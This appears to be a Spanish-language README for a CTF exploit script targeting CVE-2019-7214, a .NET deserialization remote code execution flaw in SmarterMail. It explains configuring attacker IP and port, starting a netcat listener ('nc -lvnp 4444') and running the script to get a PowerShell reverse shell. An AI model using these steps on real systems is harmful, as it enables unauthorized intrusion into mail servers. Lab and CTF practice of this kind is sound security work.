
Solo para uso en CTF (el CVE-2019-7214 también resuelve el host desde /etc/hosts)
Este script de Python apunta a un servicio vulnerable que se ejecuta en una máquina Windows remota. Envía un payload .NET serializado que lanza una reverse shell basada en PowerShell de vuelta a la máquina del atacante.
Ejecución remota de código en la deserialización de .NET para el sistema SmarterMail.
Actualice la sección de configuración del script para que coincida con su entorno:
HOSTNAME = 'hostname' # Nombre del host objetivo (resuelto mediante /etc/hosts)
PORT = 9999 # Puerto objetivo que escucha la entrada serializada
LHOST = '192.168.45.185' # IP del atacante (receptor)
LPORT = 4444 # Puerto de escucha del atacante
nc -lvnp 4444
python3 CVE-2019-7214 .py
Si tiene éxito, obtendrá un prompt de PowerShell desde el objetivo en su receptor.
System.Management.Automation.Este script se proporciona únicamente con fines educativos. El uso no autorizado contra sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas es ilegal y carece de ética.